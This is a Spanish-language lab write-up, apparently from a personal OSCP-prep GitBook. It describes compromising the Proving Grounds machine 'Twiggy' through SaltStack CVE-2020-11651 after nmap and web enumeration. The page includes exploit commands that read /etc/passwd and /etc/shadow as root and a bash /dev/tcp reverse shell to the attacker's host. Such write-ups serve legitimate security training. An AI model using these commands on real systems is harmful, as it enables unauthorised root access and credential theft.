1gnotus
  • WHOAMI
    • Mi camino a la OSCP😘
    • Mi primer Certificación la eJPT
  • HACK THE BOX
    • Page 1
    • Page 2
  • 💻Proving Ground Practice and Play
    • Writeup
      • MAQUINA JORDAK (Web RCE jordani 1.0.0 + PRIVESC 'env')
      • MAQUINA ALGERNON (VULn 'smartermail v6985 RCE')
      • MAQUINA TWIGGY (CMS MEZZANINA RCE VULN ZEROMQ ZMTP o API SALTSTACK 3000.1 'cve 2020 11651')
      • MAQUINA BOOLEAN (Modificacion de REQUEST con Burpsuite ' confirmed = true ' + LFI + UPLOAD ID_RSA an
      • MAQUINA AUTHBYT (FTP anonymous y credenciales por defecto + subida de archvio PHP revershell a FTP
      • MAQUINA CLAMV (VULN SMTP 25 'clamv' Sendmail 8.13 SEARCHSPLOIT)
      • MAQUINA COCKPIT (Gobuster extension php + Blaze CMS 'SQLI BYPASS LOGIN' + UBUNTU WEB + REVERSHELL +
      • MAQUINA CODO (CODOFORUM 5.1 'RCE + UPLOAD IMG.' + LINPEAS)
      • MAQUINA CVE-2023-40582 (Vulnerabilidad de Inyección de Comando en find exec)
      • MAQUINA CVE-2023-46818 (RCE CVE 2023 46818 ispconfig.)
      • MAQUINA DC 2 (Enum Users Wordpress WPSCAN + CEWL wordlists + BruteForce WPSCAN + PRIVESC bin git 'je
      • MAQUINA DETECTION (WEB 'changedetection' port 5000 + VULN RCE 'changedetection RCE')
      • MAQUINA ELECTION1 (Sito web Election 2.0 + PHPmyadmin login + Escalate Priv SERV U)
      • MAQUINA DVR4 (web 'Argus Surveillance DVR version 4.0.0.0' + Vuln 'Argus Surveillance DVR DIRECTORY
      • MAQUINA EXFILTRED Subrion CMS v4.2.1 File Upload Bypass to RCE (Authenticated) UPLOAD PHAR 'CMD' PRI
      • MAQUINA FAIL (ENUM RSYNC 'PUERTO 873' + SSH- KEYGEN + PREVISEC 'GROUP FAIL2BAIN')
      • MAQUINA FANTASTIC (GRAFANA 8.3 'vuln lfi' + PROMETHEUS 2.32 + ESCALATE PRIV 'group DISK = root + ID_
      • MAQUINA FUNYBOX (CSE BOOKSTORE 1.0 Vuln rce no autenticado PRIVESC pkexec 'sudo l' extra bypass login SMALL CRM ADMIN 3.0)
      • MAQUINA INTERNAL (WINDOWS SERVER 2008 + CVE 2009 3103 + METERPRETER RCE)
      • MAQUINA HUB ( Enum web port 8082 + FUGUHUB + injeccion revershell en LUA)
      • MAQUINA KEVIN (VULN HP POWER MANAGER 'admin admin' Metasploit PrivEsc 'hp manager filename' Metasploit BufferOverflow 'MANUAL')
      • MAQUINA LEVRAM (Exploit GERAPY 0.9.6 RCE searchsploit + PRIVESC 'CAPABILITES python3.10')
      • MAQUINA MEDJED (WEBDAV BarracudaDrive 6.5 + Revershell .php creado con msfvenom + PrivEsc local barracudadrive 6.5)
      • MAQUINA NUKEM (WORDPRESS 5.5.1 ABUSED PLUGINS SIMPLE LIST 4.4.2 PIVOTING USER MYSQL PASSOWORD PIVOTING PUERTO Y TUNELIZACION SSH PRIVESC 'DOSBOX' CAMBIO DE PERMISOS SUDOERS CON REMMINA)
      • MAQUINA PASS (FlatPass 1.2 Vuln 'file upload bypass RCE' Privesc 'apt get')
      • MAQUINA PELICAN (RCE ZooKeeper v1 Web UI + RCE + PrivEsc 'gcore pid + extract password 'strings' = root)
      • MAQUINA RAY PROJECT CVE 2023 6019 (COMMANDO INJECTION RAY PROJECT)
      • MAQUINA SHENZI (Enum SMB 'nullsesion' + Directory Web = Nombre del recurso compartido + WORDPRESS RC
      • MAQUINA BRATARINA (SMB null session + RCE 'OPENSMTPD 2.0.0') + (MODIFICACION passwd 'agregar password' + Subscribir archivo etc passwd)
      • MAQUINA SQUID (web proxy SQUID 4.14 + 'RCE UPLOAD script' PHPMYADMIN 5.0.2)
      • MAQUINA PC (PortForwarding port 65432 - PrivEsc 0-day 2022 rpc.py)
      • MAQUINA FUNBOXEASY (Enum directory - RCE .php - Pivoting User - PrivEsc SUDO-L)
      • MAQUINA SLORT (Enum de directorios Acceso a la maquina con LFI and RCI PrivEsc Auto Elevated Executable Hijacking)
      • MAQUINA PASSPORT (Enum Directorios ss2john id rsa PrivEsc Creacion de archivo con permisos SUID)
      • MAQUINA PYLOADER (pyload 0.5.0 Rce No autenticado)
      • MAQUINA HUTCH (Netexec LDAP enum - PrivEsc Netexec DUMP Laps)
      • MAQUINA GAARA (Brute Force SSH PrivEsc 'gdb' gtfobins)
  • 🥸CHEET-SEET
    • CheetSeet WPSCAN
  • 🐋DOCKERLABS
    • Writeup
      • MAQUINA WALKINGCMS
      • MAQUINA PN (EXPLOIT UPLOAD .WAR TOMCAT - RCE 'MSFVENOM')
  • 👺Road-to-BSCP
    • Page 4
  • 🖥️THEHACKLABS
    • Writeups
      • MAQUINA TORRIJAS(CMS WORDPRESS 6.7.2, WPSCAN PLUGINS 'WP DIRECTORY FREE 1.7.9 LocalFileInclusion PRIVESC bpftrace)
      • MAQUINA FACULTAD (Enum WPSCAN - wordpress UPLOAD RCE WP-FILE-MANAGER - PrivEsc SUDO -L RCE)
Powered by GitBook
On this page
  1. Proving Ground Practice and Play
  2. Writeup

MAQUINA TWIGGY (CMS MEZZANINA RCE VULN ZEROMQ ZMTP o API SALTSTACK 3000.1 'cve 2020 11651')

PreviousMAQUINA ALGERNON (VULn 'smartermail v6985 RCE')NextMAQUINA BOOLEAN (Modificacion de REQUEST con Burpsuite ' confirmed = true ' + LFI + UPLOAD ID_RSA an

Last updated 1 month ago

Ejecuté un ping para ver la conectividad con la maquina victima.

Luego realicé un escaneo tanto de puertos, como de servicios y versiones de estos y por ultimo un escaneo de vulnerabilidades.

Finalizando los escaneos observé que tengo 4 puertos abiertos: 22 (ssh), 53 (dns), 80 (http), y 8000 (http).

Como no tengo credenciales no puedo acceder al puerto 22 ssh, el puerto 53 no me devuelve nada interesante, luego me centro en el servidor web que corre por el puerto 80.

Ejecuté un whatweb para ver las tecnologías que están corriendo en el sitio web.

Una vez terminado me traslade a la web donde me tope con un CMS llamado Mezzanine (también lo puedo ver en el escaneo de nmap). Realice un reconocimiento de la web, use wappalyzer para ver las tecnologías que corren por la web.

Dentro del reconocimiento encontré un panel de inicio de sesión, que probando credenciales por defecto no tuve acceso.

Como metodología busque si este CMS tiene alguna vuln.

Searchsploit en su db contiene una vuln para la versión 4.2 cosa de que todavía no tengo la versión del CMS.

Volví a leer los informes de nmap donde observe que al ejecutar el análisis de vulnerabilidad apareció un puerto interesante el "4506".

Ejecuté nuevamente el escaneo de puertos bajándole el min-rate y observé que tengo 2 puertos mas abiertos "4506+4505".

Realize un breve reconocimiento para ver que es lo que esta corriendo en esos puertos.

Ahora al tener los servicios pase a buscar alguna vuln de esos servicios donde me tope con lo sigueinte.

Según este exploit puedo realizar lectura de archivos como usuario root, como también cargar archivos de forma remota.

Este exploit requiere la instalación de salt así que me abro un terminal virtual para instalarlo.

# python virtual
python3 -m venv venv
source venv/bin/active
# instalar lo que se requiera
# para desactivar la virtualizacion
deactive

Me guie a través del PoC para ver los comando a utilizar y luego veo si puedo leer el archivo /etc/passwd y el /etc/shadow ya que según el exploit lo realizo como root.

python3 exploit.py --master "ip victima" -r /etc/passwd - /etc/shadow

Según el exploit tengo una función llamada "--exec" esta la use para ejecutar comandos, aprovechando de esta función voy a realizar una conexión hacia mi maquina atacante realizando una revershell.

python3 exploit.py --master "ip victima" --exec 'bash -i >& /dev/tcp/ip atacante/80

Al ejecutar el comando veo que mi conexión fue exitosa logeandome como root.

Para tener en cuenta: al enviar la shell si le agrego las ()""() no me va interpretar el comando.

También encontré que en el puerto 8000 hay una vuln relacionado con la vuln anterior En el apartado salt-api posee una vulnerabilidad que al buscarla se llama "saltstack 3000.1" donde se ejecuta el mismo CVE usado anteriormente.

💻
https://vk9-sec.com/saltstack-salt-rest-api-arbitrary-command-execution-cve-2020-11651-
cve-2020-11652/
https://github.com/jasperla/CVE-2020-11651-poc